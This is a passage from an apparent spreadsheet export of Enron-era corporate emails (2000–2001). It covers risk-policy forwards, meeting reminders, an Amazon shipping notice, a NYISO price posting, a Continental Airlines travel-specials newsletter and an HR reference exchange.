unlimited access to information. I know that we address audit rights in the _x000D_
LLC agreement so this may not matter anyway if this is a right they already _x000D_
have.  Let me know what you think._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Gregg_x000D_
----- Forwarded by Gregg Penman/Corp/Enron on 10/23/2000 12:07 PM -----_x000D_
_x000D_
	m.nordstrom@pecorp.com_x000D_
	10/20/2000 11:32 AM_x000D_
		 _x000D_
		 To: p.burgener@pecorp.com, Vladimir.Gorny@enron.com, Gregg.Penman@enron.com_x000D_
		 cc: _x000D_
		 Subject: enovate Risk Policy_x000D_
_x000D_
_x000D_
Attached please find the latest enovate risk policy.  Our attorneys and_x000D_
internal audit area have made one language revision concerning Section XIII_x000D_
Audit Rights._x000D_
_x000D_
Mary &lt;&lt;MEH-risk Oct 20&gt;&gt;_x000D_
_x000D_
_x000D_
----------------------------------------------------------------_x000D_
The information transmitted is intended only for the person_x000D_
or entity to which it is addressed and may contain confidential_x000D_
and/or privileged material.  Any review, retransmission,_x000D_
dissemination or other use of, or taking of any action in_x000D_
reliance upon, this information by persons or entities other than the_x000D_
intended recipient is prohibited.   If you received this in error, please_x000D_
contact the sender and delete the material from any computer._x000D_
_x000D_
 - MEH-risk Oct 20.doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 May 2000 01:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sheila.glover@enron.com', 'sara.shackleton@enron.com'})</t>
  </si>
  <si>
    <t>Daily Margins</t>
  </si>
  <si>
    <t xml:space="preserve">Sara Sheilia will discuss at your 9:30._x000D_
_x000D_
Bob_x000D_
---------------------- Forwarded by Bob Klein/HOU/ECT on 05/23/2000 08:50 AM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Gerri Gosnell                           05/22/2000 10:02 AM_x000D_
	_x000D_
_x000D_
To: Bob Klein/HOU/ECT@ECT, Michael E Moscoso/HOU/ECT@ECT, Jefferson D _x000D_
Sorenson/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Daily Margins_x000D_
_x000D_
Good Morning!_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 8 May 2001 00:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Legal Credit Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kay Mann/Corp/Enron on 05/08/2001 07:18 _x000D_
AM ---------------------------_x000D_
From: Zionette Vincent on 05/07/2001 01:50 PM_x000D_
To: Genia FitzGerald/HOU/ECT@ECT, Tracy Ngo/Enron@EnronXGate, Christian _x000D_
Yoder/HOU/ECT@ECT, Kim S Theriot/HOU/ECT@ECT, Rhonda L Denton/HOU/ECT@ECT, _x000D_
Veronica Gonzalez/Enron@EnronXGate, Janet H Moore/HOU/ECT@ECT, Wendy _x000D_
Conwell/Enron@EnronXGate, Paul Radous/Enron@EnronXGate, Marcus _x000D_
Nettelton/NA/Enron@ENRON, Melissa Ann Murphy/HOU/ECT@ECT, Edward _x000D_
Sacks/Enron@EnronXGate, Kay Mann/Corp/Enron@Enron, Steve J _x000D_
Hall/ETOL/EU/Enron@ENRON, Carol St Clair/HOU/ECT@ECT, David Portz/HOU/ECT@ECT_x000D_
cc: Linda J Simmons/HOU/ECT@ECT, Martha Keesler/ENRON@enronXgate, Yolanda _x000D_
Pena/Enron@EnronXGate _x000D_
_x000D_
Subject: Legal Credit Meeting_x000D_
_x000D_
Reminder_x000D_
_x000D_
Legal Credit Meeting_x000D_
_x000D_
Wednesday, May 9, 2001_x000D_
10:00 AM - 11:00 AM_x000D_
EB38c2_x000D_
_x000D_
_x000D_
Thanks,_x000D_
"Z" (Zionette) Vincent_x000D_
x.54858_x000D_
</t>
  </si>
  <si>
    <t>Sat, 28 Apr 2001 04:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Price Reservations 27 April 2001 Real-Time Market and 28 April_x000D_
	 2001 Day-Ahead Market</t>
  </si>
  <si>
    <t xml:space="preserve">CGoering@nyiso.com writes to the NYISO_TECH_EXCHANGE Discussion List:_x000D_
_x000D_
The NYISO is reserving hours beginning 00:00, 01:00, 13:00, and 14:00 in the_x000D_
April 27, 2001 Real-Time Market as well as the following hours per _x000D_
ECA20001006B_x000D_
to verify prices:_x000D_
_x000D_
PJM: 05:00 and 23:00_x000D_
HQ:  05:00 and 23:00_x000D_
OH:  05:00 and 23:00_x000D_
NE:  05:00 and 23:00_x000D_
_x000D_
Prices in the April 28, 2001 Day-Ahead Market are correct._x000D_
_x000D_
This e-mail information is a copy of the official posting which can be found _x000D_
at_x000D_
the following address on our website:_x000D_
http://mis.nyiso.com/public/htm/OperMessages/CurrentOperMessages.htm#mm_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 04:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'orders@amazon.com'})</t>
  </si>
  <si>
    <t>Your Amazon.com order (#107-2294148-4912521)</t>
  </si>
  <si>
    <t>Greetings from Amazon.com._x000D_
_x000D_
We thought you'd like to know that we shipped your items today,_x000D_
and that this completes your order._x000D_
_x000D_
Thanks for shopping at Amazon.com, and we hope to see you again soon._x000D_
_x000D_
The following items were included in this shipment:_x000D_
---------------------------------------------------------------------_x000D_
Qty      Item                           Price  Shipped  Subtotal_x000D_
---------------------------------------------------------------------_x000D_
1        The Ten Things You Can't Say i $19.16  1       $19.16_x000D_
1        Drudge Manifesto               $18.36  1       $18.36_x000D_
1        Hoffritz 16-Ounce Chrome Cockt $24.99  1       $24.99_x000D_
_x000D_
---------------------------------------------------------------------_x000D_
               Item Subtotal:  $62.51_x000D_
         Shipping &amp; Handling:  $6.28_x000D_
                       Total:  $68.79_x000D_
--------------------------------------------------------------------_x000D_
_x000D_
This shipment was sent to:_x000D_
_x000D_
 Eric P. Bass_x000D_
 2302 Travis St._x000D_
 #8225_x000D_
 Houston TX 77006_x000D_
_x000D_
via UPS Ground (3-7 business days)._x000D_
_x000D_
For your reference, the number you can use to track your package is_x000D_
1Z410E7W0363771516.  You can refer to our web site's Help page or:_x000D_
_x000D_
http://www.amazon.com/exec/obidos/subst/tracking.html_x000D_
_x000D_
to retrieve current tracking information.  Please note that tracking_x000D_
information may not be available immediately._x000D_
_x000D_
You can view or manage your orders online by visiting Your Account at_x000D_
http://www.amazon.com/your-account. You can also reach Your Account by_x000D_
clicking the link in the top right corner of any page on our Web site._x000D_
_x000D_
If you still need to get in touch with us about your order, send_x000D_
an e-mail message to orders@amazon.com, or contact us via FAX_x000D_
(1-206-266-2950) or phone (1-800-201-7575 for US customers or_x000D_
1-206-266-2992 for international customers)._x000D_
_x000D_
On your next visit to our Web site, come see what's New for You_x000D_
by clicking the link on the right-hand side of our home page, or_x000D_
by visiting this URL:_x000D_
_x000D_
http://www.amazon.com/exec/obidos/subst/recs/new-for-you/new-for-you.html/ref=_x000D_
cs_ae_nfy_x000D_
_x000D_
We've selected an assortment of new releases, recommendations, and_x000D_
informative articles that we think would appeal to you._x000D_
_x000D_
Thank you for shopping at Amazon.com._x000D_
_x000D_
---------------------------------------------------------------------_x000D_
Amazon.com_x000D_
Earth's Biggest Selection_x000D_
orders@amazon.com             http://www.amazon.com/_x000D_
_x000D_
"Hitch your wagon to a star" -- Ralph Waldo Emerson_x000D_
Four-wheeled summer fun in Toys:_x000D_
http://www.amazon.com/exec/obidos/tg/toys/browse-toys/-/171651/ref=oe_sc_1_x000D_
---------------------------------------------------------------------</t>
  </si>
  <si>
    <t>Tue, 9 Jan 2001 09:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: November and December P&amp;L</t>
  </si>
  <si>
    <t>Sharon,_x000D_
_x000D_
I just saw you call.  John Arnold is on my phone so I couldn't pick up.  How _x000D_
does Thursday sound for a meeting.  I am available all day until 2:30.  _x000D_
Friday is also good for me._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Errol McLaughlin</t>
  </si>
  <si>
    <t>Sun, 30 Jan 2000 23:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 01/31/2000 _x000D_
07:54 AM ---------------------------_x000D_
_x000D_
_x000D_
VKaminski@aol.com on 01/30/2000 03:43:57 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: (no subject)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - ED_c06_Sim&amp;Trees.doc_x000D_
</t>
  </si>
  <si>
    <t>Thu, 9 Nov 2000 09:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">I do know Jana.  She has worked in various positions within my group for _x000D_
years since she joined us in the analyst program.  She has not been the _x000D_
strongest player.  Her level of accuracy has not been what we would have _x000D_
liked in many of the roles that she has played for us (confirmations and _x000D_
settlements).  And despite feedback, she is one of those players that just _x000D_
has never quite viewed her performance level in the same light that we see _x000D_
it.  She currently supports trading operations for South America, reporting _x000D_
to Martha Stevens under Scott Mills.  Let me check with Scott on his thoughts _x000D_
about her current performance and on her in an HR role.  I will let you know _x000D_
what he thinks.  It may be to date that we just haven't had Jana in the right _x000D_
role for her.  If I remember correctly, she was originally a teacher who went _x000D_
back to school to get a business degree.  Very sweet, pleasant to work with _x000D_
and personable.  I will get back with you after I have talked with Scott, or _x000D_
I may have him leave you a message.   _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Cindy Olson@ENRON_x000D_
11/09/2000 10:05 AM_x000D_
To: Sally Beck/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Thank you_x000D_
_x000D_
Sally, do you know Jana?????  Would you recommend her???_x000D_
---------------------- Forwarded by Cindy Olson/Corp/Enron on 11/09/2000 _x000D_
09:58 AM ---------------------------_x000D_
_x000D_
_x000D_
Jana Morse_x000D_
11/09/2000 09:05 AM_x000D_
To: Cindy Olson/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Thank you_x000D_
_x000D_
Cindy,_x000D_
I just wanted to thank you for you time, information, and encouragement _x000D_
yesterday.  Any guidance you can provide on how I should approach a career _x000D_
change to Human Resources is very welcome._x000D_
_x000D_
I've attached my resume for your review and consideration.  I look forward to _x000D_
hearing from you soon._x000D_
_x000D_
Thanks again,_x000D_
Jana Morse x30972_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 18:06:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'continental_airlines_inc_052901@airmail.continental.com'})</t>
  </si>
  <si>
    <t>CO.O.L.TRAVEL SPECIALS FOR Patrice Thurston</t>
  </si>
  <si>
    <t xml:space="preserve">CO.O.L. TRAVEL SPECIALS_x000D_
DOMESTIC U.S._x000D_
Wednesday, May 30, 2001_x000D_
****************************************_x000D_
_x000D_
TELL A FRIEND ABOUT CO.O.L. TRAVEL SPECIALS_x000D_
_x000D_
Don't keep these great deals to yourself. Let your friends in on_x000D_
the good news by forwarding this copy of CO.O.L. Travel Specials_x000D_
so they can also take advantage of this week's deals._x000D_
_x000D_
CO.O.L. Travel Specials don't last long, so send this to your friends and then_x000D_
book your eTicket today at_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=eD6i0B21hg0Ow0mdX0Af_x000D_
_x000D_
_x000D_
****************************************_x000D_
TABLE OF CONTENTS FOR CO.O.L. TRAVEL SPECIALS_x000D_
1. CO.O.L. Travel Specials Offers_x000D_
2. Featured Fares Sample Destinations_x000D_
3. Alamo Rent A Car Offers_x000D_
4. National Car Rental Offers_x000D_
5. Westin Hotels &amp; Resorts, Sheraton Hotels &amp; Resorts,_x000D_
   Four Points by Sheraton, St. Regis, The Luxury Collection and W Hotels_x000D_
6. Hilton Hotel Offers_x000D_
_x000D_
****************************************_x000D_
This week's specials are good for the following markets departing Saturday,_x000D_
June 2 and returning on either Monday, June 4 or Tuesday, June 5, 2001. Please_x000D_
see the Terms and Conditions listed at the end of_x000D_
this e-mail._x000D_
****************************************_x000D_
1. CO.O.L. Travel Specials Offers_x000D_
_x000D_
Purchase CO.O.L. Travel Specials online until 11:59pm (CST) Friday at_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=eD6i0B21hg0Ow0mdX0Af_x000D_
You can also purchase CO.O.L. Travel Specials for an additional cost of $20 per_x000D_
ticket through our telephone service at 1-800-642-1617._x000D_
_x000D_
********************************_x000D_
TRAVEL MAY ORIGINATE IN EITHER CITY_x000D_
********************************_x000D_
****Roundtrip BETWEEN CLEVELAND, OH and:_x000D_
_x000D_
$159 - Greensboro/Piedmont Triad, NC_x000D_
$149 - Providence, RI_x000D_
$129 - South Bend, IN_x000D_
$139 - Syracuse, NY_x000D_
$119 - Washington, DC (Dulles Airport only)_x000D_
_x000D_
_x000D_
****Roundtrip BETWEEN HOUSTON, TX and:_x000D_
$139 - Los Angeles, CA_x000D_
$139 - Louisville, KY_x000D_
$99  - McAllen /Rio Grand Valley, TX_x000D_
$169 - New York  (LaGuardia only)_x000D_
$239 - Orange County/Santa Ana, CA_x000D_
$129 - San Angelo, TX_x000D_
$139 - San Jose, CA_x000D_
$169 - Washington, DC (National Airport only)_x000D_
_x000D_
****Roundtrip BETWEEN NEW YORK/NEWARK and:_x000D_
_x000D_
$139 - Albany, NY_x000D_
$89  - Burlington, VT_x000D_
$119 - Hartford, CT_x000D_
$109 - Providence, RI_x000D_
$89  - Rochester, NY_x000D_
$189 - Seattle/Tacoma, WA_x000D_
$89  - Syracuse, NY_x000D_
$139 - West Palm Beach, FL_x000D_
_x000D_
_x000D_
********************************_x000D_
2. FEATURED FARES SAMPLE DESTINATION_x000D_
_x000D_
Choose your fare, find your flight. Or, quickly sift through all our great_x000D_
featured fares by choosing a destination or origin. Be spontaneous. Get out of_x000D_
town. Current Featured Fares destinations include:_x000D_
_x000D_
New York, Baltimore, Buffalo, Houston,_x000D_
Cleveland, Phoenix, and many more._x000D_
_x000D_
Note: Featured Fares change often. To see a regularly-updated online list and_x000D_
purchase our Featured Fares, visit the website at:_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=eD6i0B21hg0Ow0mdY0Ag_x000D_
_x000D_
(Capacity controls and other restrictions apply)_x000D_
_x000D_
_x000D_
********************************_x000D_
3. CO.O.L. TRAVEL SPECIALS FROM ALAMO RENT A CAR_x000D_
_x000D_
Rates listed below are valid on compact class vehicles at airport locations_x000D_
only. Other car types may be available.  Rates are valid for rentals on_x000D_
Saturday, June 2, 2001 with returns Monday, June 4, 2001 or Tuesday, June 5,_x000D_
2001._x000D_
-------------------------------_x000D_
$26 a day in:  Hartford, CT (BDL)_x000D_
$19 a day in:  Cleveland, OH (CLE)_x000D_
$18 a day in:  Washington, DC (DCA)_x000D_
$30 a day in:  Newark, NJ (EWR)_x000D_
$18 a day in:  Greensboro, NC (GSO)_x000D_
$18 a day in:  Washington, DC (IAD)_x000D_
$18 a day in:  Houston, TX (IAH)_x000D_
$20 a day in:  Los Angeles, CA (LAX)_x000D_
$26 a day in:  Providence, RI (PVD)_x000D_
$20 a day in:  Seattle, WA (SEA)_x000D_
$20 a day in:  San Jose, CA (SJC)_x000D_
$20 a day in:  Orange County, CA (SNA)_x000D_
_x000D_
_x000D_
To receive special Continental CO.O.L. discounted rates, simply make advance_x000D_
reservations and be sure to request ID # 596871 and Rate Code 33. Book your_x000D_
reservation online at:_x000D_
_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=eD6i0B21hg0Ow0bf10Ar_x000D_
or contact Alamo at 1-800 GO ALAMO._x000D_
_x000D_
*If you are traveling to a city or a different date that is not listed, Alamo_x000D_
offers great rates when you book online at:_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=eD6i0B21hg0Ow0bf20As_x000D_
_x000D_
For complete details on these offers, please refer to Alamo's terms and_x000D_
conditions below._x000D_
_x000D_
_x000D_
****************************************_x000D_
4. CO.O.L. TRAVEL SPECIALS FROM NATIONAL CAR RENTAL_x000D_
_x000D_
Rates listed below are valid on intermediate class vehicles at airport locations_x000D_
only. Other car types may be available.  Rates are valid for rentals on_x000D_
Saturday, June 2, 2001 with returns Monday, June 4, 2001 or Tuesday, June 5,_x000D_
2001._x000D_
------------------------------------------_x000D_
$29 a day in:  Hartford, CT (BDL)_x000D_
$51 a day in:  Burlington, VT (BTV)_x000D_
$21 a day in:  Cleveland, OH (CLE)_x000D_
$21 a day in:  Washington, DC (DCA)_x000D_
$32 a day in:  Newark, NJ (EWR)_x000D_
$21 a day in:  Greensboro, NC (GSO)_x000D_
$21 a day in:  Washington, DC (IAD)_x000D_
$21 a day in:  Houston, TX (IAH)_x000D_
$47 a day in:  New York, NY (LGA)_x000D_
$23 a day in:  Los Angeles, CA (LAX)_x000D_
$29 a day in:  McAllen/Rio Grand Valley, TX (MFE)_x000D_
$29 a day in:  West Palm Beach, FL (PBI)_x000D_
$21 a day in:  Rochester, NY (ROC)_x000D_
$23 a day in:  Louisville, KY (SDF)_x000D_
$23 a day in:  Seattle, WA (SEA)_x000D_
$23 a day in:  San Jose, CA (SJC)_x000D_
$23 a day in:  Orange County, CA (SNA)_x000D_
$21 a day in:  Syracuse, NY (SYR)_x000D_
_x000D_
_x000D_
To receive your special Continental Airlines CO.O.L. Travel Specials discounted_x000D_
rates, simply make your reservations in advance and be sure to request Product_x000D_
Code COOLUS.  To make your reservation, contact National at 1-800-CAR-RENT_x000D_
(1-800-227-7368), or book your reservation online at_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=eD6i0B21hg0Ow0mdZ0Ah_x000D_
Please enter COOLUS in the Product Rate Code field, and 5037126 in the Contract_x000D_
ID field to ensure you get these rates on these dates._x000D_
_x000D_
_x000D_
* If you are traveling to a city or a different date that is not listed,_x000D_
National offers great rates when you book online at:_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=eD6i0B21hg0Ow0DwD0Ax_x000D_
_x000D_
For complete details on these offers, please refer to National's terms and_x000D_
conditions below._x000D_
_x000D_
_x000D_
****************************************_x000D_
5. CO.O.L. TRAVEL SPECIALS LAST-MINUTE WEEKEND_x000D_
RATES FROM WESTIN HOTELS &amp; RESORTS, SHERATON HOTELS_x000D_
&amp; RESORTS, FOUR POINTS BY SHERATON, ST. REGIS,_x000D_
THE LUXURY COLLECTION, AND W HOTELS_x000D_
_x000D_
Visit our site for booking these and other Last-Minute Weekend Rates for_x000D_
this weekend June 1- June 5, 2001._x000D_
http://airmail.continental.com/cgi-bin5/flo?y=eD6i0B21hg0Ow0D7n0Ab_x000D_
_x000D_
--------------------------------------_x000D_
California - Pomona - Sheraton Suites Fairplex - $69.00_x000D_
California - Santa Monica - Four Points by Sheraton Santa Monica - $109.00_x000D_
California - Los Angeles - W Los Angeles Westwood - $219.00_x000D_
California - Los Angeles - The Century Plaza Hotel &amp; Spa - $139.00_x000D_
California - Los Angeles - The St. Regis, Los Angeles - $249.00_x000D_
California - Los Angeles - The Westin Los Angeles Airport - $84.00_x000D_
California - Millbrae - The Westin San Francisco Airport - $110.00_x000D_
California - Ontario - Sheraton Ontario Airport Hotel - $51.00_x000D_
California - Pleasanton - Four Points by Sheraton Pleasanton - $56.00_x000D_
California - Santa Clara - The Westin Santa Clara - $75.00_x000D_
California - Sunnyvale - Sheraton Sunnyvale Hotel - $250.00_x000D_
California - Universal City - Sheraton Universal Hotel - $99.00_x000D_
_x000D_
Connecticut - Danbury - Sheraton Danbury Hotel - $89.00_x000D_
Connecticut - Stamford - Sheraton Stamford Hotel - $71.00_x000D_
Connecticut - Stamford - The Westin Stamford - $77.00_x000D_
_x000D_
District of Columbia - Washington - The Westin Grand, Washington D.C. -_x000D_
$185.00_x000D_
District of Columbia - Washington - The Westin Fairfax - $109.00_x000D_
_x000D_
New Jersey - Edison - Sheraton Edison Hotel Raritan Center - $75.00_x000D_
New Jersey - Parsippany - Sheraton Parsippany Hotel - $70.00_x000D_
New Jersey - Piscataway - Four Points by Sheraton Piscataway - $65.00_x000D_
New Jersey - Woodbridge - Sheraton at Woodbridge Place Hotel - $71.00_x000D_
_x000D_
New York - New York - Essex House - A Westin Hotel - $228.00_x000D_
New York - New York City - Sheraton New York Hotel and Towers - $169.00_x000D_
New York - New York City - Sheraton Manhattan Hotel - $169.00_x000D_
New York - New York City - Sheraton Russell Hotel - $179.00_x000D_
_x000D_
North Carolina - Chapel Hill - Sheraton Chapel Hill Hotel - $77.00_x000D_
_x000D_
Ohio - Cuyahoga Falls - Sheraton Suites Akron/Cuyahoga Falls - $99.00_x000D_
Ohio - Independence - Four Points by Sheraton Cleveland South - $65.00_x000D_
_x000D_
Rhode Island - Warwick - Sheraton Providence Airport Hotel - $79.00_x000D_
_x000D_
Texas - Houston - The Westin Galleria Houston - $64.00_x000D_
Texas - Houston - The Westin Oaks - $70.00_x000D_
Texas - Houston - Sheraton Houston Brookhollow Hotel - $45.00_x000D_
Texas - Houston - Sheraton North  Houston at George Bush Intercontinental -_x000D_
$64.00_x000D_
_x000D_
Washington - Seattle - The Westin Seattle - $135.00_x000D_
Washington - Tacoma - Sheraton Tacoma Hotel - $69.00_x000D_
_x000D_
_x000D_
_x000D_
For complete details on these offers, please refer to the terms and conditions_x000D_
below._x000D_
_x000D_
_x000D_
****************************************_x000D_
6. CO.O.L. TRAVEL SPECIALS ON HILTON HOTELS AND RESORTS_x000D_
_x000D_
The following rates are available June 2-4, 2001 and are priced per night._x000D_
--------------------------------------_x000D_
Cleveland, OH - Hilton Garden Inn Cleveland Airport - $89_x000D_
Cleveland, OH - Hilton Cleveland East/Beachwood, Beachwood, OH. - $109_x000D_
_x000D_
Hartford, CT - Doubletree Hotel Bradley International Airport, Windsor_x000D_
Locks, CT. - $149_x000D_
_x000D_
Houston, TX - Hilton Houston Westchase and Towers - $65/Night,6/2-3_x000D_
Houston, TX - Hilton Houston Southwest - $109_x000D_
_x000D_
Los Angeles, CA - Hilton Los Angeles Airport - $70_x000D_
Los Angeles, CA - Hilton Burbank Airport &amp; Convention Center, Burbank, CA. -_x000D_
$149_x000D_
Los Angeles, CA - Doubletree Hotel Los Angeles-Westwood - $179_x000D_
Los Angeles &amp; Anaheim, CA - Hilton Irvine/Orange County Airport, Irvine, CA._x000D_
- $169_x000D_
_x000D_
Louisville, KY - Doubletree Club Louisville - $109_x000D_
_x000D_
NewYork, NY &amp; Newark, NJ - Hilton Pearl River, Pearl River, NY. -_x000D_
$139/Night,  6/2-3_x000D_
New York, NY &amp; Newark, NJ - Hilton Parsippany, Parsippany, NJ. - $89_x000D_
New York, NY &amp; Newark, NJ - Millennium Hilton Next to the World Trade_x000D_
Center, New York, NY. - $125_x000D_
New York, NY &amp; Newark, NJ - Hilton New York, New York, NY. - $179/Night,_x000D_
6/2-3_x000D_
New York, NY &amp; Newark, NJ - Doubletree Club Norwalk, Norwalk, CT. - $139_x000D_
_x000D_
Palm Beach, FL - Hilton Palm Beach Airport, West Palm Beach, FL. - $86_x000D_
Palm Beach, FL - Doubletree Hotel Palm Beach Gardens, Palm Beach Gardens,_x000D_
FL. - $99_x000D_
_x000D_
San Jose, CA - Hilton San Jose &amp; Towers - $209/Night, 6/2-3_x000D_
San Jose, CA - Hilton Garden Inn San Mateo, San Mateo, CA. - $69/Night,_x000D_
6/2-3_x000D_
San Jose, CA - Hilton Garden Inn Cupertino, Cupertino, CA. - $249_x000D_
San Jose, CA - Hilton Garden Inn Mountain View, Mountain View, CA. - $249_x000D_
San Jose, CA - Doubletree Hotel Modesto, Modesto, CA. - $89_x000D_
_x000D_
Washington, DC - Hilton Crystal City at Ronald Reagan National Airport,_x000D_
Arlington, VA - $199_x000D_
Washington, DC - Hilton McLean Tysons Corner, McLean, VA. - $89/Night, 6/2-3_x000D_
Washington, DC - Hilton Arlington and Towers, Arlington, VA. - $199_x000D_
Washington, DC - Hilton Washington Embassy Row, Washington, DC. - $175_x000D_
Washington, DC - Hilton Alexandria Mark Center, Alexandria, VA. - $79/Night,_x000D_
6/2-3_x000D_
Washington, DC - Hilton Washington Dulles Airport, Herndon, VA. - $165_x000D_
_x000D_
To book this week's special rates for Hilton Family Hotels, visit and book at_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=eD6i0B21hg0Ow0jWG0A7_x000D_
_x000D_
Special rates apply only for the dates listed at each hotel and are subject_x000D_
to availability. Check hilton.com for specific dates at each Hilton Family_x000D_
Hotel. Or call at 1-800-774-1500 and ask for Value Rates. Restrictions apply to_x000D_
these rates._x000D_
_x000D_
_x000D_
****************************************_x000D_
CO.O.L. TRAVEL SPECIALS RULES:_x000D_
Fares include a $37.20 fuel surcharge.  Passenger Facility Charges, up to $12_x000D_
depending on routing, are not included. Up to $2.75 per segment federal excise_x000D_
tax, as applicable, is not included.  Applicable International and or Canadian_x000D_
taxes and fees up to $88, varying by destination, are not included and may vary_x000D_
slightly depending on currency exchange rate at the time of purchase. For a_x000D_
complete listing of rules please visit:_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=eD6i0B21hg0Ow0mda0Ao_x000D_
_x000D_
_x000D_
ALAMO RENT A CAR'S TERMS AND CONDITIONS:_x000D_
Taxes (including VLF taxes up to US$1.89 per day in California and GST), other_x000D_
governmentally-authorized or imposed surcharges, license recoupment fees, fuel,_x000D_
additional driver fee, drop charges and optional items (such as CDW Waiver_x000D_
Savers(R) up to US$18.99 a day,) are extra. Renter must meet standard age,_x000D_
driver and credit requirements. Rates higher for drivers under age 25._x000D_
Concession recoupment fees may add up to 14% to the rental rate at some_x000D_
on-airport locations. Up to 10.75% may be added to the rental rate if you rent_x000D_
at an off-airport location and exit on our shuttle bus. Weekly rates require a_x000D_
5-day minimum rental or daily rates apply. For weekend rates, the vehicle must_x000D_
be picked up after 9 a.m. on Thursday and returned before midnight on Monday or_x000D_
higher daily rates apply. 24-hour advance reservation required. May not be_x000D_
combined with other discounts. Availability is limited. All vehicles must be_x000D_
returned to the country of origin. Offer not valid in San Jose, CA._x000D_
_x000D_
_x000D_
NATIONAL CAR RENTAL TERMS AND CONDITIONS:_x000D_
Customer must provide Contract ID# at the time of reservation to be eligible_x000D_
for discounts. Offer valid at participating National locations in the US and_x000D_
Canada. Minimum rental age is 25. This offer is not valid with any other special_x000D_
discount or promotion. Standard rental qualifications apply. Subject to_x000D_
availability and blackout dates. Advance reservations required. Geographic_x000D_
driving restrictions may apply._x000D_
_x000D_
_x000D_
TERMS AND CONDITIONS FOR WESTIN, SHERATON, FOUR POINTS,_x000D_
ST. REGIS, THE LUXURY COLLECTION, AND W HOTELS:_x000D_
Offer is subject to availability. Advance Reservations required and is based_x000D_
on single/double occupancy. Offer not applicable to group travel. Additional_x000D_
Service charge and tax may apply. The discount is reflected in the rate quoted._x000D_
Offer valid at participating hotel only. Offer valid for stays on Fri - Mon with_x000D_
a Friday or Saturday night arrival required. Rate available for this coming_x000D_
weekend only. Offer available only by making reservations via the internet. A_x000D_
limited number of rooms may be available at these rates._x000D_
_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=eD6i0B21hg0Ow0FG20At_x000D_
_x000D_
_x000D_
---------------------------------------_x000D_
This E-mail message and its contents are copyrighted and are proprietary_x000D_
products of Continental Airlines, Inc.  Any unauthorized use, reproduction,_x000D_
or transfer of the message or its content, in any medium, is strictly_x000D_
prohibited._x000D_
_x000D_
****************************************_x000D_
UNFORTUNATELY MAIL SENT TO THIS ADDRESS CANNOT BE ANSWERED._x000D_
PLEASE SEND ALL INQUIRIES TO: mailto:eservice@coair.com_x000D_
_x000D_
_x000D_
TO UNSUBSCRIBE:_x000D_
We hope you will find CO.O.L. Travel Specials a valuable source of information._x000D_
However, if you prefer not to take advantage of this opportunity, please let us_x000D_
know by visiting the CO.O.L. Travel Specials page on our web site at:_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=eD6i0B21hg0Ow0mdb0Ap_x000D_
_x000D_
TO SUBSCRIBE:_x000D_
Please visit the CO.O.L. Travel Specials page on our web site at:_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=eD6i0B21hg0Ow0mdc0Aq_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 09:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Delta docs</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Catherine,_x000D_
_x000D_
I don't remember who actually gives the notice, but in anticipation of the _x000D_
funding of the escrow tomorrow, here are the docs._x000D_
_x000D_
_x000D_
_x000D_
I understand there is also a two day notice.  I don't believe I've seen a _x000D_
form for that one yet._x000D_
_x000D_
Who should send this out tomorrow after we get the fed ref?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 10:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Defense Group Internet Site</t>
  </si>
  <si>
    <t xml:space="preserve">approved_x000D_
_x000D_
_x000D_
_x000D_
	"Fergus, Gary S." &lt;GFergus@brobeck.com&gt;_x000D_
	05/16/2001 06:25 PM_x000D_
		 _x000D_
		 To: "Richard B. Sanders Esq. (E-mail)" &lt;richard.b.sanders@enron.com&gt;_x000D_
		 cc: "Andy Pickens (E-mail)" &lt;apickens@gibbs-bruns.com&gt;, "Barrett H. Reasoner _x000D_
(E-mail)" &lt;breasoner@gibbs-bruns.com&gt;, "David J. Noonan (E-mail)" _x000D_
&lt;djn@pkns.com&gt;, "Jean Frizzell (E-mail)" &lt;jfrizzell@gibbs-bruns.com&gt;, _x000D_
"Michael L. Kirby (E-mail)" &lt;dcastro@pkns.com&gt;, "Michael Molland" _x000D_
&lt;MMolland@brobeck.com&gt;, "Mike D. Smith (E-mail)" &lt;msmith1@enron.com&gt;, "Peter _x000D_
